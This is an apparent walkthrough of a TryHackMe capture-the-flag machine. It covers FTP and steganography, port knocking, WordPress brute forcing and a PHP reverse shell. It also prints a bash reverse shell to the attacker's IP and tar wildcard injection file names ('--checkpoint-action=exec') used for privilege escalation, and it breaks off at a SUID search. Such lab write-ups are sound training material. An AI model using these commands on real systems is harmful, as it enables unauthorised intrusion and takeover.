Tryhackme Server CTF Writeup

6 min readMar 18, 2021

As the room maker said in tryhackme, let’s add “server.thm” to our /etc /hosts file and then start with nmap scanning.

Command: nmap -vv -sCV server.thm

PORT     STATE    SERVICE REASON      VERSION
21/tcp   open     ftp     syn-ack     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
-rw-r--r--    1 ftp      ftp         80661 Mar 16 20:05 door.jpg
-rw-r--r--    1 ftp      ftp         39687 Mar 16 20:05 wordlist.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.45.10
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open     ssh     syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7b:e8:74:b0:4e:5c:46:22:37:21:ec:46:9c:b3:10:94 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJoUPjJy//wHhPrBWn/xtvb1mAMpAgh07VzG8U5EFW2NZUEOQgH/fU9SKEry3eeuNWTHH1hXIUbfSwFnYEXw0+ZpEcfa+uTNjgnkf/kLleoKMczPWIaHhVFuWOwIaIt0uVwhOuQW6JNS94MypfBQxpWoGuUqU3q86cWQBaUw9D7fwo7fKGeSM0yDaQao41e4BvOOewdTR/0dfWfBleoTUMN0fcS72qoiKME6OqtAn6bLYyQrDvcWaTLAGCbd/wmY0wmf0a7H9Zctq8/vzLSlSl8rSUMfubvtfGxHjpQKujgeekLmH1Gx7EEce2+gCTKvOyCbhjkmwdxFx+WjV3wtwl
|   256 0c:6f:25:d8:8e:31:26:7c:bf:59:21:44:76:fe:f0:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBXUAIIRko0wrs/cDZCNaKf4xLSBXHOVfB0V4E28dYIHsY24bkc7qK5T9OAvVEk2GFGq7QgGW8wZN+tnZCVD1Kk=
|   256 8b:f7:c7:83:5b:29:ca:ee:e1:38:2e:9e:de:86:7b:91 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHGi1XdviL86Yi6IQxeEbv3luei3IhHmBtL3tvQ4SjD8
2604/tcp filtered ospfd   no-response
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let’s login as anonymous in FTP

Command: ftp server.thm

Connected to server.thm.
220 (vsFTPd 3.0.3)
Name (server.thm:hakanbey): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 16 20:08 .
drwxr-xr-x    2 ftp      ftp          4096 Mar 16 20:08 ..
-rw-r--r--    1 ftp      ftp         80661 Mar 16 20:05 door.jpg
-rw-r--r--    1 ftp      ftp         39687 Mar 16 20:05 wordlist.txt
226 Directory send OK.
ftp>

Let’s gets the files named “door.jpg” and “wordlist.txt”

ftp> get door.jpg

ftp> get wordlist.txt

Let’s start brute force with stegcracker as it can have stenegrophy.

Command: stegcracker door.jpg wordlist.txt

We have a password. We can extract the hidden text document.

Command: steghide extract -sf door.jpg

Enter passphrase: 
wrote extracted data to "read_me_85.txt".

It’s like it’s encrypted when we read the secret file.

We go back and look at the photo

As can be seen from this photo, the “knock porting” method was used and this should be the numbers we found in the hidden text.

Command: knock server.thm *******

We scan nmap again

Command: nmap -vv server.thm

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 04:29 EDT
Initiating Ping Scan at 04:29
Scanning server.thm (10.10.244.170) [2 ports]
Completed Ping Scan at 04:29, 0.09s elapsed (1 total hosts)
Initiating Connect Scan at 04:29
Scanning server.thm (10.10.244.170) [1000 ports]
Discovered open port 21/tcp on 10.10.244.170
Discovered open port 22/tcp on 10.10.244.170
Discovered open port 80/tcp on 10.10.244.170
Completed Connect Scan at 04:29, 6.94s elapsed (1000 total ports)
Nmap scan report for server.thm (10.10.244.170)
Host is up, received syn-ack (0.094s latency).
Scanned at 2021-03-18 04:29:44 EDT for 7s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ackRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds

HTTP port is active. Let’s go and have a look.

There is another domain. Let’s do a DNS scan.

Command: gobuster vhost -u http://server.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://server.thm
[+] Threads:      10
[+] Wordlist:     /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2021/03/18 04:36:24 Starting gobuster
===============================================================
Found: wordpress.server.thm (Status: 200) [Size: 26091]
Found: gc._msdcs.server.thm (Status: 400) [Size: 422]
===============================================================
2021/03/18 04:37:16 Finished
===============================================================

Now that we learned about the other domain name, let’s add it to our hosts file and continue.

I scanned it a little bit but couldn’t find anything. We have username and a wordlist. Let’s do a brute force with wpscan.

Command: wpscan --url http://wordpress.server.thm -U hakanbey -P wordlist.txt

Well done. Now we have the password. We can login from the Wordpress login page.

Go to Appearance-Editor section and select 404.php section. And paste our reverse shell commands here.(Perhaps you are not only allowed to write in active theme)

Now, let’s start listening with netcat and activate the reverse shell.

Command: nc -lvp 4444

http://wordpress.server.thm/wp-content/themes/twentynineteen/404.php

listening on [any] 4444 ...
connect to [10.9.45.10] from server.thm [10.10.244.170] 37932
Linux ubuntu 4.15.0-137-generic #141-Ubuntu SMP Fri Feb 19 13:46:27 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 08:51:27 up 45 min,  0 users,  load average: 0.00, 0.02, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

We spawn pty with Python and export xterm.

www-data@ubuntu:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$

I scanned for a long time and when I used “pspy64” I found a cronjob used by hakanbey

https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0

Command: ./pspy64s

I understand that I have to do wildcard privilege escalation here.

https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

Command: cd /var/www/html/

By the way, let’s get the web flag from here.

Command: cat ***********.txt

thm{34c699ab9**************914e6672}

Let’s continue with Wilcard and start listening with netcat and activate the reverse shell.

Command: nc -lvp 5555

echo '#!/bin/bash' > a.sh
echo 'bash -c "bash -i >& /dev/tcp/10.9.45.10/5555 0>&1"' >> a.sh
echo '' > "--checkpoint-action=exec=bash a.sh"
echo '' > --checkpoint=1-------------------------------------------------------------------
listening on [any] 5555 ...
connect to [10.9.45.10] from server.thm [10.10.244.170] 41090
bash: cannot set terminal process group (2028): Inappropriate ioctl for device
bash: no job control in this shell
hakanbey@ubuntu:/var/www/html$

We spawn pty with Python and export xterm.

While reading the “user.txt” file, there was a file named “hint.txt”.

Command: cat user.txt && cat hint.txt

thm{3823351d3************7b8033f747}--------------------------------------------------------------------
The id_rsa file of the root is readable but encrypted with vigenere cipher. I can use cybercheff for decrypt.(You can find it by trying)

The id_rsa file of root could be read. So how?

Let’s scan for SUID

Command: find / -perm -4000 -type f 2>/dev/null